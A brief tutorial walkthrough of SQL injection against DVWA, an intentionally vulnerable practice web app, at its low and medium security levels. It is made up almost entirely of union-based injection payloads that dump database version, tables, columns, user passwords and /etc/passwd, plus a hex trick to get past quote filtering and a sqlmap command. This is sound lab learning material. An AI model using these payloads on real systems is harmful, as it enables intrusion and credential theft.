HOWTO : DVWA SQL Injection

Security level = low



99 or 1=1

- will display all the records



99 or 1=1 union select 1,2,3

- will display "The used SELECT statements have a different number of columns" error message



99 or 1=1 union select 1,2

- no error message but display all records



99 or 1=1 union select null,null

- no error message but display all records



99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa



99 or 1=1 union select null, user()

or

99 or 1=1 union select user(), null

- will display the current user of the database



99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'

- will display the users table column list



99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- we are looking for users table's first_name and password



99 or 1=1 union select null,@@datadir

- will display the mysql directory



99 or 1=1 union all select null,load_file('/etc/passwd')

- will display the content of /etc/passwd



Security level = medium



99 or 1=1

- will display all the records



99 or 1=1 union select 1,2,3

- will display "The used SELECT statements have a different number of columns" error message



99 or 1=1 union select 1,2

- no error message but display all records



99 or 1=1 union select null,null

- no error message but display all records



99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa



99 or 1=1 union select null, user()

or

99 or 1=1 union select user(), null

- will display the current user of the database



99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns

- since where clause cannot be used, all column name should be listed



or



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273

- where 0x7573657273 is Hex value of "users"



99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- we are looking for users table's first_name and password



99 or 1=1 union select null,@@datadir

- will display the mysql directory



sqlmap for Security = low



./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns



For Security = medium is similar.



That's all! See you!